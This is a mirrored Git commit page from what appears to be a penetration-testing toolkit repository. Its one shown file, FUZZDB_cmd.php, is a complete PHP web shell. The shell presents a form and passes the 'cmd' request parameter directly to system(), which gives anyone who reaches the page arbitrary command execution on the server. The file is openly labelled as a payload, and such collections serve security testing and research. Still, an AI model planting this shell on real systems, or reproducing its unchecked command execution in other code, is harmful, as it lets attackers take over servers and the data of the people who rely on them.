mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-06-18 03:49:16 -04:00
Add some fuzzing stuff and wordlists
This commit is contained in:
parent
4261c9c087
commit
4d24e016b8
160 changed files with 7723391 additions and 527 deletions
25
Vulnerabilities_and_Exploits/Payloads/FUZZDB_cmd.php
Executable file
25
Vulnerabilities_and_Exploits/Payloads/FUZZDB_cmd.php
Executable file
|
@ -0,0 +1,25 @@
|
|||
<?
|
||||
//
|
||||
// PHP_KIT
|
||||
//
|
||||
// cmd.php = Command Execution
|
||||
//
|
||||
// by: The Dark Raver
|
||||
// modified: 21/01/2004
|
||||
//
|
||||
?>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<?
|
||||
if($_GET['cmd']) {
|
||||
system($_GET['cmd']);
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</BODY></HTML>
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue